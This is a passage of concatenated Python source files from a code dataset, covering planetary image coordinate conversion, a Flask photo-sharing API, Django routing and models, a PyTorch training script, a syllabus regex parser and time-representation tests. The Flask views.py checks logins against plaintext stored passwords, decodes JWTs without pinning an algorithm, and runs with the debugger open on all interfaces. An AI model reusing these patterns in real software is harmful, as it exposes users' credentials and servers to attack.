shape.\"\n )\n x_coords = x\n y_coords = y\n else:\n raise TypeError(\n f\"The values of x and y were neither Sequences nor individual \"\n f\"numbers, they were: {x} and {y}\"\n )\n\n results = []\n if pvl.load(cube_path).get(\"IsisCube\").get(\"Mapping\"):\n # We have a projected image, and must use mappt\n mappt_common_args = dict(allowoutside=allowoutside, type=point_type)\n\n for xx, yy in zip(x_coords, y_coords):\n mappt_args = {\n \"ground\": dict(\n longitude=xx,\n latitude=yy,\n coordsys=\"UNIVERSAL\"\n ),\n \"image\": dict(\n # Convert PLIO pixels to ISIS pixels\n sample=xx+0.5,\n line=yy+0.5\n )\n }\n for k in mappt_args.keys():\n mappt_args[k].update(mappt_common_args)\n mapres = pvl.loads(isis.mappt(cube_path, **mappt_args[point_type]).stdout)[\"Results\"]\n \n # convert from ISIS pixels to PLIO pixels\n mapres['Sample'] = mapres['Sample'] - 0.5\n mapres['Line'] = mapres['Line'] - 0.5\n\n results.append(mapres)\n else:\n # Not projected, use campt\n if point_type == \"ground\":\n # campt uses lat, lon for ground but sample, line for image.\n # So swap x,y for ground-to-image calls\n p_list = [f\"{lat}, {lon}\" for lon, lat in zip(x_coords, y_coords)]\n else:\n p_list = [\n f\"{samp+0.5}, {line+0.5}\" for samp, line in zip(x_coords, y_coords)\n ]\n\n # ISIS's campt needs points in a file\n with isis.fromlist.temp(p_list) as f:\n cp = isis.campt(\n cube_path,\n coordlist=f,\n allowoutside=allowoutside,\n usecoordlist=True,\n coordtype=point_type\n )\n\n camres = pvl.loads(cp.stdout)\n for r in camres.getall(\"GroundPoint\"):\n if r['Error'] is None:\n # convert all pixels to PLIO pixels from ISIS\n r[\"Sample\"] -= .5\n r[\"Line\"] -= .5\n results.append(r)\n else:\n raise ValueError(\n f\"ISIS campt completed, but reported an error: {r['Error']}\"\n )\n\n if isinstance(x, (abc.Sequence, np.ndarray)):\n return results\n else:\n return results[0]\n\n\ndef image_to_ground(\n cube_path: os.PathLike,\n sample,\n line,\n lontype=\"PositiveEast360Longitude\",\n lattype=\"PlanetocentricLatitude\",\n):\n \"\"\"\n Returns a two-tuple of numpy arrays or a two-tuple of floats, where\n the first element of the tuple is the longitude(s) and the second\n element are the latitude(s) that represent the coordinate(s) of the\n input *sample* and *line* in *cube_path*.\n\n If *sample* and *line* are single numbers, then the returned two-tuple\n will have single elements. If they are Sequences, then the returned\n two-tuple will contain numpy arrays.\n\n Raises the same exceptions as point_info().\n\n Parameters\n ----------\n cube_path : os.PathLike\n Path to the input cube.\n\n sample : Number or Sequence of Numbers\n Sample coordinate(s).\n\n line : Number or Sequence of Numbers\n Line coordinate(s).\n\n lontype: str\n Name of key to query in the campt or mappt return to get the returned\n longitudes. Defaults to \"PositiveEast360Longitude\", but other values\n are possible. Please see the campt or mappt documentation.\n\n lattype: str\n Name of key to query in the campt or mappt return to get the returned\n latitudes. Defaults to \"PlanetocentricLatitude\", but other values\n are possible. Please see the campt or mappt documentation.\n\n \"\"\"\n res = point_info(cube_path, sample, line, \"image\")\n\n if isinstance(sample, (abc.Sequence, np.ndarray)):\n lon_list = list()\n lat_list = list()\n for r in res:\n lon_list.append(_get_value(r[lontype]))\n lat_list.append(_get_value(r[lattype]))\n\n lons = np.asarray(lon_list)\n lats = np.asarray(lat_list)\n else:\n lons = _get_value(res[lontype])\n lats = _get_value(res[lattype])\n\n return lons, lats\n\n\ndef _get_value(obj):\n \"\"\"Returns *obj*, unless *obj* is of type pvl.collections.Quantity, in\n which case, the .value component of the object is returned.\"\"\"\n if isinstance(obj, pvl.collections.Quantity):\n return obj.value\n else:\n return obj\n\n\ndef ground_to_image(cube_path, lon, lat):\n \"\"\"\n Returns a two-tuple of numpy arrays or a two-tuple of floats, where\n the first element of the tuple is the sample(s) and the second\n element are the lines(s) that represent the coordinate(s) of the\n input *lon* and *lat* in *cube_path*.\n\n If *lon* and *lat* are single numbers, then the returned two-tuple\n will have single elements. If they are Sequences, then the returned\n two-tuple will contain numpy arrays.\n\n Raises the same exceptions as point_info().\n\n Parameters\n ----------\n cube_path : os.PathLike\n Path to the input cube.\n\n lon: Number or Sequence of Numbers\n Longitude coordinate(s).\n\n lat: Number or Sequence of Numbers\n Latitude coordinate(s).\n\n \"\"\"\n res = point_info(cube_path, lon, lat, \"ground\")\n\n if isinstance(lon, (abc.Sequence, np.ndarray)):\n samples, lines = np.asarray([[r[\"Sample\"], r[\"Line\"]] for r in res]).T\n else:\n samples, lines = res[\"Sample\"], res[\"Line\"]\n\n return samples, lines\n\n\n","sub_path":"autocnet/spatial/isis.py","file_name":"isis.py","file_ext":"py","file_size_in_byte":11608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"574658650","text":"\"\"\"\nFlask Documentation: http://flask.pocoo.org/docs/\nJinja2 Documentation: http://jinja.pocoo.org/2/documentation/\nWerkzeug Documentation: http://werkzeug.pocoo.org/documentation/\nThis file creates your application.\n\"\"\"\nfrom json import JSONEncoder\nfrom app import app, db, filefolder,login_manager,token_key\nfrom flask import render_template, request, url_for ,redirect,flash,jsonify, g, session\nfrom flask_login import login_user, logout_user, current_user, login_required\nfrom .forms import LoginForm, PostForm, RegisterForm\nfrom .models import Users, Posts, Follows, Likes\nfrom werkzeug.utils import secure_filename\nimport os\nimport datetime\nimport jwt\nfrom functools import wraps\npostfolder='static/images/'\n\n\n\n\n\ndef requires_auth(f):\n @wraps(f)\n def decorated(*args, **kwargs):\n auth = request.headers.get('Authorization', None)\n if not auth:\n return jsonify({'code': 'authorization_header_missing', 'description': 'Authorization header is expected'}), 401\n\n parts = auth.split()\n\n if parts[0].lower() != 'bearer':\n return jsonify({'code': 'invalid_header', 'description': 'Authorization header must start with Bearer'}), 401\n elif len(parts) == 1:\n return jsonify({'code': 'invalid_header', 'description': 'Token not found'}), 401\n elif len(parts) > 2:\n return jsonify({'code': 'invalid_header', 'description': 'Authorization header must be Bearer + \\s + token'}), 401\n\n token = parts[1]\n try:\n payload = jwt.decode(token, token_key)\n get_user = Users.query.filter_by(id=payload['user_id']).first()\n\n except jwt.ExpiredSignature:\n return jsonify({'code': 'token_expired', 'description': 'token is expired'}), 401\n except jwt.DecodeError:\n return jsonify({'code': 'token_invalid_signature', 'description': 'Token signature is invalid'}), 401\n\n g.current_user = user = get_user\n return f(*args, **kwargs)\n\n return decorated\n\n@app.route('/')\ndef index():\n \"\"\"Render website's initial page and let VueJS take over.\"\"\"\n return render_template('index.html')\n\n\n\n\n\n@app.route('/.txt')\ndef send_text_file(file_name):\n \"\"\"Send your static text file.\"\"\"\n file_dot_text = file_name + '.txt'\n return app.send_static_file(file_dot_text)\n\n@app.route(\"/api/users/register\",methods=[\"POST\"])\ndef register():\n form=RegisterForm()\n if request.method==\"POST\" and form.validate_on_submit():\n if form.password.data!=form.confirmpassword.data:\n return jsonify (errors=[{'error':['Passwords do not match']}])\n usernametest=Users.query.filter_by(username=form.username.data).first()\n emailtest=Users.query.filter_by(email=form.email.data).first()\n if usernametest is not None or emailtest is not None:\n if usernametest is not None:\n return jsonify(errors=[{'error':['Username not available. Please enter a different username']}])\n if emailtest is not None:\n return jsonify(errors=[{'error':['Email not available. Please use a different email address']}])\n else:\n fileupd=form.profile_photo.data\n filename=secure_filename(fileupd.filename)\n created=datetime.datetime.now()\n user=Users(form.fname.data,form.lname.data,form.username.data,form.email.data,form.password.data,form.location.data,form.biography.data,filename,created)\n db.session.add(user)\n db.session.commit()\n fileupd.save(os.path.join(filefolder,filename))\n usertest=Users.query.filter_by(username=form.username.data).first()\n if usertest is not None:\n return jsonify(response=[{'message':'Account created','username':usertest.username}])\n \n else:\n return jsonify(errors=[{'error':['Your account was not added. Please try again']}])\n error=[{'error':form_errors(form)}]\n return jsonify(errors=error)\n\n@login_manager.user_loader\ndef load_user(id):\n return Users.query.get(int(id))\n\n@app.route(\"/api/auth/login\", methods=[\"POST\"])\ndef login():\n #if session['userid']:\n # return jsonify(errors=[{'error':['You are already logged in.']}])\n form = LoginForm()\n if request.method == \"POST\" and form.validate_on_submit():\n # change this to actually validate the entire form submission\n # and not just one field\n username=form.username.data\n password=form.password.data\n \n user=Users.query.filter_by(username=username,password=password).first()\n # Get the username and password values from the form.\n if user is not None:\n payload = {'user_id' : user.id}\n token = jwt.encode(payload, token_key).decode('utf-8')\n session['userid'] = user.id;\n return jsonify(response=[{'message':'Log in successful','token': token, 'userid': user.id,'userphoto':postfolder+user.profile_photo}])\n flash('You were successfully logged in')\n else:\n return jsonify(errors=[{'error':['Password and user name does not match our records.']}])\n flash('Password and user name does not match our records')\n return jsonify(errors=[{'error':form_errors(form)}])\n\n\n@app.route(\"/api/auth/logout\",methods=[\"GET\"])\n@requires_auth\ndef logout():\n g.current_user=None\n if session['userid']:\n session.pop('userid')\n return jsonify(response=[{'message':'User successfully logged out.'}])\n\n \n@app.route(\"/api/users//posts\",methods=[\"GET\",\"POST\"])\n@requires_auth\ndef addpost(user_id):\n form=PostForm()\n if request.method==\"GET\":\n thisuser=''\n if user_id==0 or user_id==session['userid']:\n uid=session['userid']\n thisuser='Yes'\n \n else:\n uid=user_id\n thisuser='No'\n user=Users.query.filter_by(id=uid).first()\n if user is not None:\n userinfo={'id':user.id,'username':user.username,'fname':user.first_name,'lname':user.last_name,'location':user.location,'photo':postfolder+user.profile_photo,'bio':user.biography,'joined':user.joined_on.strftime(\"%B %Y\")}\n posts=Posts.query.filter_by(user_id=uid).all()\n follows=Follows.query.filter_by(user_id=uid).all()\n following=Follows.query.filter_by(follower_id=session['userid'], user_id=uid).first()\n isfollowing=''\n if following is None:\n isfollowing='No'\n else:\n isfollowing='Yes'\n return jsonify(response=[{'posts':[review_post(posts)],'numposts':len(posts),'follows':len(follows),'userinfo':userinfo,'current':thisuser,'following':isfollowing}])\n else:\n return jsonify(error={'error':'User does not exist'});\n if request.method==\"POST\" and form.validate_on_submit():\n image=form.photo.data\n filename=secure_filename(image.filename)\n created=datetime.datetime.now()\n post=Posts(session['userid'],filename,form.caption.data,created)\n db.session.add(post)\n db.session.commit()\n image.save(os.path.join(filefolder,filename))\n return jsonify(response=[{'message':'Post added successfully'}])\n return jsonify(errors=[{'error':form_errors(form)}])\n \n@app.route(\"/api/users//follow\",methods=[\"POST\"])\n@requires_auth\ndef follow(user_id):\n if request.method==\"POST\":\n follow=Follows(user_id,session['userid'])\n db.session.add(follow)\n db.session.commit()\n user=Users.query.filter_by(id=user_id).first()\n return jsonify(response={'message':'You are now following '+user.username})\n \n@app.route(\"/api/posts\",methods=[\"GET\"])\n@requires_auth\ndef getpost():\n posts=Posts.query.order_by(Posts.created_on.desc()).all()\n return jsonify(response=[{'posts':review_post(posts)}])\n \n@app.route(\"/api/posts//like\",methods=[\"POST\"])\n@requires_auth\ndef likepost(post_id):\n if request.method==\"POST\":\n like=Likes(session['userid'],post_id)\n db.session.add(like)\n db.session.commit()\n count=likes_counter(post_id)\n return jsonify(response=[{'message':'Post Liked'}])\n \n\ndef form_errors(form):\n error_messages = []\n \"\"\"Collects form errors\"\"\"\n for field, errors in form.errors.items():\n for error in errors:\n message = u\"Error in the %s field - %s\" % (\n getattr(form, field).label.text,\n error\n )\n error_messages.append(message)\n\n return error_messages\n\n\n\n@login_manager.user_loader\ndef load_user(id):\n return Users.query.get(int(id))\n\n\n\ndef review_post(posts):\n like_tester='';\n newposts=[]\n for i in range (0,len(posts)):\n user=Users.query.filter_by(id=posts[i].user_id).first();\n username=user.username;\n profilephoto=user.profile_photo;\n likevar=Likes.query.filter_by(post_id=posts[i].id,user_id=session['userid']).first()\n if likevar is None:\n like_tester='No'\n else:\n like_tester='Yes'\n wisdom={\n 'id':posts[i].id,\n 'user_id':posts[i].user_id,\n 'photo':postfolder+posts[i].photo,\n 'caption':posts[i].caption,\n 'created_on':posts[i].created_on.strftime(\"%d %b %Y\"),\n 'likes':likes_counter(posts[i].id),\n 'username':username,\n 'userphoto':postfolder+profilephoto,\n 'likebyuser':like_tester\n }\n newposts.append(wisdom)\n return newposts\n \ndef likes_counter(post_id):\n count=Likes.query.filter_by(post_id=post_id).all()\n return len(count)\n \n\n\n@app.after_request\ndef add_header(response):\n\n response.headers['X-UA-Compatible'] = 'IE=Edge,chrome=1'\n response.headers['Cache-Control'] = 'public, max-age=0'\n return response\n\n\n@app.errorhandler(404)\ndef page_not_found(error):\n \"\"\"Custom 404 page.\"\"\"\n return render_template('404.html'), 404\n\n\nif __name__ == '__main__':\n app.run(debug=True, host=\"0.0.0.0\", port=\"8080\")\n","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":10027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"412521221","text":"\nfrom django.contrib import admin\nfrom django.urls import path, include\nfrom django.conf import settings\nfrom django.contrib.staticfiles.urls import static,staticfiles_urlpatterns\n\n\n# app_name = 'Route'\nviews = __import__(\"MVC Structure.Controller.views\")\nviews = views.Controller.views\n# from MVC_Structure.Controller.views import views\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('account/signup/',views.sign_up,name='signup'),\n path('account/login/', views.login_user, name='login'),\n path('account/logout/', views.logout_user, name='logout'),\n path('account/profile/',views.user_profile, name='profile'),\n path('shop/add/', views.add_to_cart, name=\"add\"),\n path('shop/remove/',views.remove_from_cart, name='remove'),\n path('shop/increase/', views.increase_cart, name='increase'),\n path('shop/decrease/', views.decrease_item, name='decrease'),\n path('shop/cart/',views.cart_view, name='cart'),\n path('payment/checkout/', views.checkout, name='checkout'),\n path('payment/pay/',views.payment, name=\"payment\"),\n path('payment/status/',views.complete, name='complete'),\n path('payment/purchase///', views.purchase, name='purchase'),\n path('payment/orders/', views.order_view, name='orders'),\n path('', views.Home.as_view(), name='home'),\n path('product/',views.ProductDetail.as_view(), name=\"product_detail\"),\n # path('',include('App_Shop.urls')),\n # path('shop/', include('App_Order.urls')),\n # path('payment/', include('App_Payment.urls')),\n]\n\nurlpatterns += staticfiles_urlpatterns()\nurlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n","sub_path":"E_Commerce_Platform/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"606409160","text":"import torch\nfrom torch import nn, optim\nfrom dataset.cyp450_1a2_data import cyp1a2_dataset\nfrom model.sgc import SGC_network\nfrom sklearn.metrics import r2_score\nfrom torch_geometric.data import DataLoader\n\npath=\"E:/ind content/bayes_labs_project/deepchem_data/Data_cyp450/data_cyp450_1a2.csv\"\ndataset=cyp1a2_dataset(path)\nprint(len(dataset))\nd_train=dataset[:int((len(dataset))*0.9)]\nd_test =dataset[int((len(dataset))*0.9):]\n\nclass RMSELoss(nn.Module):\n def __init__(self):\n super(RMSELoss,self).__init__()\n self.mse = nn.MSELoss()\n def forward(self, yhat, y):\n return torch.sqrt(self.mse(yhat, y))\n\n\nclass Train(object):\n def __init__(self, model, parameters, epochs, lr):\n # self.model = model(*parameters).to('cuda')\n self.model = model(**parameters)\n self.epoch = epochs\n self.criterion = RMSELoss()\n self.lr = lr\n # self.batch_size=batch_size\n def __call__(self, *input):\n train_loader = DataLoader(input[0], batch_size=32, shuffle=True)\n\n optimizer = optim.Adam(self.model.parameters(), lr=self.lr)\n for epoch in range(self.epoch):\n l = 0\n count = 0\n for data in train_loader:\n optimizer.zero_grad()\n # data = data.to('cuda')\n self.model = self.model.train()\n output = self.model(data)\n loss = self.criterion(output, data.y)\n loss.backward()\n optimizer.step()\n l += loss.item()\n count += 1\n if (epoch % 100 == 0):\n print(l / count)\n\n torch.save(self.model, 'E:/ind content/pycharm/office_pro/demo_project/Training/cyp450_1a2.pt')\n test_loader = DataLoader(input[1], batch_size=1, shuffle=False)\n y_hat = [0.0] * len(test_loader)\n y = [0.0] * len(test_loader)\n model = torch.load('E:/ind content/pycharm/office_pro/demo_project/Training/cyp450_1a2.pt')\n model = model.eval()\n count1 = 0\n for data in test_loader:\n out=model(data)\n # out = model(data.to('cuda'))\n y_hat[count1] += out.item()\n y[count1] += float(data.y.view(1))\n count1 += 1\n r_score = r2_score(y, y_hat)\n print(\"r_score:\",r_score)\n return r_score\n\nif __name__==\"__main__\":\n params = {'in_channel': 40,\n 'hid1': 128,\n 'hid2': 256,\n 'hid3': 128,\n 'lin1': 512,\n 'lin2': 128,\n 'out': 1,\n 'drop': 0.5,\n 'K': 2}\ntraining = Train(SGC_network, params, 1, 0.001)\ntraining(d_train,d_test)\n","sub_path":"ADMET/CYP450_isotopes_inhibitor/CYP450_1A2/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"284889201","text":"import os\nimport re\nimport textract\nimport util\n\n\nKEY_WORDS = [r'([A-Za-z]*\\s?homework[s]?)', '(quiz[zes]*)', \nr'[A-Za-z]*\\s?(test[s]?)', \\\n'(attendance)', '(participation)', '(project[s]?)', \"(response[s]?)\", \\\n '(presentation[s]?)', '(paper[s]?)', \"(performance[s]?)\", r\"(mid\\-?term)\", \\\n r\"(mid\\-?term [123])\\s\", r\"(midterm\\s?[sexampry]*)\", r\"(final\\s?[sexampry]*)\",\\\n r'[A-Za-z]*\\s?(asssignment[s]?)', r\"([A-Za-z0-9\\-]+)\\s([A-Za-z0-9\\-]{4,25})\", \\\n r\"([A-Za-z0-9\\-]{4,25})\"]\n\nPERCENTS = [\nr\"\\s?[\\:\\-\\,]?\\s(\\(?\\d+\\.?\\d*\\%\\)?)\",\nr\"\\s\\(.+\\)\\s?[\\:\\-\\,]?\\s(\\(?\\d+\\.?\\d*\\%\\)?)\",\nr\"\\s?[\\:\\-\\,\\=]?\\s(\\(?\\d+\\.?\\d* percent\\)?)\",\nr\"\\s\\(.+\\)\\s?[\\:\\-\\,\\=]?\\s(\\(?\\d+\\.?\\d* percent\\)?)\",\nr\"\\s?[\\:\\-\\,]?\\s(\\(?\\d+\\.?\\d*\\% of [A-Za-z]+ [A-Za-z]+\\)?)\",\nr\" counts for (\\d+\\.?\\d*\\% of [A-Za-z]+ [A-Za-z]+)\",\nr\" will count for (\\d+\\.?\\d*\\% of [A-Za-z]+ [A-Za-z]+)\",\n]\n\n\ndef get_grade_breakdown(text, year):\n '''\n Tries multiple regex to obtain grade breakdown from course syllabi.\n\n Inputs:\n text: (str) The text of a syllabus PDF.\n\n Returns:\n The grade breakdown in the syllabi for the course.\n '''\n\n grade_components = []\n done = \"\"\n\n # trying regex in text\n for word in KEY_WORDS:\n for percent in PERCENTS:\n results = re.findall(r\"\" + word + percent, text)\n if results:\n for result in results:\n results = results[0]\n check_this = result[-2] + result[-1]\n check_this = check_this.replace(\" \", \"\")\n if check_this not in done: # exclude duplicates\n done += \" \" + check_this\n grade_components.append(list(result))\n\n # building a string representing the breakdown\n breakdown_string = []\n done2 = \"\"\n for item in grade_components:\n percent = get_percent(item)\n percent += \"%\"\n s = ' '.join(item[:-1]) + \": \" + percent\n if s not in done2: # here excluding any duplicates\n done2 += \" \" + s\n breakdown_string.append(s)\n breakdown_string = \"; \".join(breakdown_string)\n if not breakdown_string:\n return \"No grade breakdown available.\"\n \n return breakdown_string\n\n\ndef get_percent(result):\n '''\n Gets the total percentage of a grade component, from a string.\n\n Inputs:\n result: (str) A regex result containing a percentage(s).\n\n Returns:\n The percetage(s) combined.\n '''\n\n percent = 0.0\n percent_list = re.findall(r\"\\d+\\.?\\d*\", result[-1])\n for i in percent_list:\n percent += float(i)\n\n return str(percent)","sub_path":"syllabi_scraping/grade_breakdown.py","file_name":"grade_breakdown.py","file_ext":"py","file_size_in_byte":2623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"328951430","text":"from django.contrib.auth.models import User\nfrom django.db import models\nfrom django.utils import timezone\n\n\nclass Post(models.Model):\n\n h1 = models.CharField(max_length=200)\n title = models.CharField(max_length=200)\n url = models.SlugField()\n description = models.TextField(blank=True)\n text = models.TextField()\n image = models.ImageField(blank=True, upload_to='media')\n created_at = models.DateField(default=timezone.now)\n author = models.ForeignKey(User, on_delete=models.CASCADE, blank=True)\n tag = models.CharField(max_length=200, blank=True)\n\n def __str__(self):\n return self.title\n\n\nclass Comment(models.Model):\n\n post = models.ForeignKey(Post, on_delete=models.CASCADE, related_name='comments')\n user = models.ForeignKey(User, on_delete=models.CASCADE, related_name='user_name')\n text = models.TextField()\n date = models.DateTimeField(default=timezone.now)\n\n class Meta:\n ordering = ['-date']\n\n def __str__(self):\n return self.text\n","sub_path":"main/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"506179760","text":"# tests for western time representation\n\n# Copyright (c) 2012-2020 Francesco Ricciardi\n#\n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n#\n# * Redistributions of source code must retain the above copyright notice,\n# this list of conditions and the following disclaimer.\n# * Redistributions in binary form must reproduce the above copyright notice,\n# this list of conditions and the following disclaimer in the documentation\n# and/or other materials provided with the distribution.\n# * Neither the name(s) of the copyright holders nor the names of its\n# contributors may be used to endorse or promote products derived from this\n# software without specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AS IS AND ANY EXPRESS OR\n# IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF\n# MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO\n# EVENT SHALL THE COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT, INDIRECT,\n# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT\n# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA,\n# OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF\n# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING\n# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\n__author__ = \"Francesco Ricciardi \"\n\nfrom decimal import Decimal\nfrom fractions import Fraction\nfrom math import floor\nimport pickle\nimport pytest\n\nfrom datetime2.western import WesternTime\n\n\nINF = float(\"inf\")\nNAN = float(\"nan\")\n\nwestern_time_test_data = [\n # day_frac western as hours as minutes as seconds\n # numer denom h m s num denum num denum num denum\n # Boundary conditions around midnight\n # hour, minute, second and their halves second\n [\"0/1\", (0, 0, 0), \"0/1\", \"0/1\", \"0/1\"],\n [\"1/24\", (1, 0, 0), \"1/1\", \"60/1\", \"3600/1\"],\n [\"23/24\", (23, 0, 0), \"23/1\", \"1380/1\", \"82800/1\"],\n [\"1/48\", (0, 30, 0), \"1/2\", \"30/1\", \"1800/1\"],\n [\"47/48\", (23, 30, 0), \"47/2\", \"1410/1\", \"84600/1\"],\n [\"1/1440\", (0, 1, 0), \"1/60\", \"1/1\", \"60/1\"],\n [\"1439/1440\", (23, 59, 0), \"1439/60\", \"1439/1\", \"86340/1\"],\n [\"1/2880\", (0, 0, 30), \"1/120\", \"1/2\", \"30/1\"],\n [\"2879/2880\", (23, 59, 30), \"2879/120\", \"2879/2\", \"86370/1\"],\n [\"1/86400\", (0, 0, 1), \"1/3600\", \"1/60\", \"1/1\"],\n [\"86399/86400\", (23, 59, 59), \"86399/3600\", \"86399/60\", \"86399/1\"],\n [\"1/172800\", (0, 0, 0.5), \"1/7200\", \"1/120\", \"1/2\"],\n [\"172799/172800\", (23, 59, 59.5), \"172799/7200\", \"172799/120\", \"172799/2\"],\n # Boundary conditions around noon (e.g. for AM/PM switch)\n # hour, minute, second and their halves second\n [\"1/2\", (12, 0, 0), \"12/1\", \"720/1\", \"43200/1\"],\n [\"11/24\", (11, 0, 0), \"11/1\", \"660/1\", \"39600/1\"],\n [\"13/24\", (13, 0, 0), \"13/1\", \"780/1\", \"46800/1\"],\n [\"23/48\", (11, 30, 0), \"23/2\", \"690/1\", \"41400/1\"],\n [\"25/48\", (12, 30, 0), \"25/2\", \"750/1\", \"45000/1\"],\n [\"719/1440\", (11, 59, 0), \"719/60\", \"719/1\", \"43140/1\"],\n [\"721/1440\", (12, 1, 0), \"721/60\", \"721/1\", \"43260/1\"],\n [\"1439/2880\", (11, 59, 30), \"1439/120\", \"1439/2\", \"43170/1\"],\n [\"1441/2880\", (12, 0, 30), \"1441/120\", \"1441/2\", \"43230/1\"],\n [\"43199/86400\", (11, 59, 59), \"43199/3600\", \"43199/60\", \"43199/1\"],\n [\"43201/86400\", (12, 0, 1), \"43201/3600\", \"43201/60\", \"43201/1\"],\n [\"86399/172800\", (11, 59, 59.5), \"86399/7200\", \"86399/120\", \"86399/2\"],\n [\"86401/172800\", (12, 0, 0.5), \"86401/7200\", \"86401/120\", \"86401/2\"],\n # fractional part of day\n [\" 1/10\", (2, 24, 0), \"12/5\", \"144/1\", \"8640/1\"],\n [\"1/100\", (0, 14, 24), \"6/25\", \"72/5\", \"864/1\"],\n [\"1/1000\", (0, 1, \"132/5\"), \"3/125\", \"36/25\", \"432/5\"],\n [\"1/10000\", (0, 0, \"216/25\"), \"3/1250\", \"18/125\", \"216/25\"],\n [\"1/100000\", (0, 0, \"108/125\"), \"3/12500\", \"9/625\", \"108/125\"],\n [\"1/1000000\", (0, 0, \"54/625\"), \"3/125000\", \"9/6250\", \"54/625\"],\n [\n \"999999/1000000\",\n (23, 59, \"37446/625\"),\n \"2999997/125000\",\n \"8999991/6250\",\n \"53999946/625\",\n ],\n [\n \"99999/100000\",\n (23, 59, \"7392/125\"),\n \"299997/12500\",\n \"899991/625\",\n \"10799892/125\",\n ],\n [\"9999/10000\", (23, 59, \"1284/25\"), \"29997/1250\", \"179982/125\", \"2159784/25\"],\n [\"999/1000\", (23, 58, \"168/5\"), \"2997/125\", \"35964/25\", \"431568/5\"],\n [\"99/100\", (23, 45, 36), \"594/25\", \"7128/5\", \"85536/1\"],\n [\"9/10\", (21, 36, 0), \"108/5\", \"1296/1\", \"77760/1\"],\n]\n\nwestern_time_out_of_range_data = [\n # negative hour, minute or second\n [30, 10, -1],\n [30, -1, 20],\n [-1, 10, 20],\n # values above limits\n [30, 10, 60],\n [30, 10, 61],\n [30, 60, 20],\n [30, 61, 20],\n [24, 0, 0],\n [25, 0, 0],\n]\n\nwestern_time_microseconds = [\n # boundary conditions\n [\"0/1\", \"000000\"],\n [\"1/1000000\", \"000001\"],\n [\"1/2000000\", \"000000\"],\n [\"999999/1000000\", \"999999\"],\n [\"1999999/2000000\", \"999999\"],\n # a few not so random numbers\n [\"3/7\", \"428571\"],\n [\"12345/23456\", \"526304\"],\n]\n\nto_utc_test_data = [\n [\"-24\", Fraction(-24, 1)],\n [Decimal(\"-23.5\"), Fraction(-47, 2)],\n [-2, Fraction(-2, 1)],\n [-0.5, Fraction(-1, 2)],\n [Fraction(0, 1), Fraction(0, 1)],\n [Decimal(0.25), Fraction(1, 4)],\n [2, Fraction(2, 1)],\n [23.5, Fraction(47, 2)],\n [\"24\", Fraction(24, 1)],\n]\n\n\nclass TestWestern:\n def test_000_constructor(self):\n for test_row in western_time_test_data:\n hour = test_row[1][0]\n minute = test_row[1][1]\n second = Fraction(test_row[1][2])\n western = WesternTime(hour, minute, second)\n assert (western.hour, western.minute, western.second) == (\n hour,\n minute,\n second,\n )\n\n def test_001_constructor_types_for_seconds(self):\n for integer_second in (3, \"3\"):\n western = WesternTime(5, 4, integer_second)\n assert western.to_seconds() == Fraction(18243, 1)\n for fractional_second in (1.25, Fraction(5, 4), \"1.25\", Decimal(\"1.25\"), \"5/4\"):\n western = WesternTime(5, 4, fractional_second)\n assert western.to_seconds() == Fraction(72965, 4)\n\n def test_010_constructor_in_hours(self):\n for test_row in western_time_test_data:\n in_hours = Fraction(test_row[2])\n hour = test_row[1][0]\n minute = test_row[1][1]\n second = Fraction(test_row[1][2])\n western = WesternTime.in_hours(in_hours)\n assert (western.hour, western.minute, western.second) == (\n hour,\n minute,\n second,\n )\n\n def test_020_constructor_in_minutes(self):\n for test_row in western_time_test_data:\n in_minutes = Fraction(test_row[3])\n hour = test_row[1][0]\n minute = test_row[1][1]\n second = Fraction(test_row[1][2])\n western = WesternTime.in_minutes(in_minutes)\n assert (western.hour, western.minute, western.second) == (\n hour,\n minute,\n second,\n )\n\n def test_030_constructor_in_seconds(self):\n for test_row in western_time_test_data:\n in_seconds = Fraction(test_row[4])\n hour = test_row[1][0]\n minute = test_row[1][1]\n second = Fraction(test_row[1][2])\n western = WesternTime.in_seconds(in_seconds)\n assert (western.hour, western.minute, western.second) == (\n hour,\n minute,\n second,\n )\n\n def test_070_timezone_valid(self):\n for test_to_utc in to_utc_test_data:\n western1 = WesternTime(1, 2, 3, to_utc=test_to_utc[0])\n assert western1.to_utc == test_to_utc[1]\n western2 = WesternTime.in_hours(\"789/123\", to_utc=test_to_utc[0])\n assert western2.to_utc == test_to_utc[1]\n western2 = WesternTime.in_minutes(\"78901/123\", to_utc=test_to_utc[0])\n assert western2.to_utc == test_to_utc[1]\n western3 = WesternTime.in_seconds(\"789012/123\", to_utc=test_to_utc[0])\n assert western3.to_utc == test_to_utc[1]\n\n\n def test_090_constructor_day_frac(self):\n for test_row in western_time_test_data:\n day_frac = Fraction(test_row[0])\n hour = test_row[1][0]\n minute = test_row[1][1]\n second = 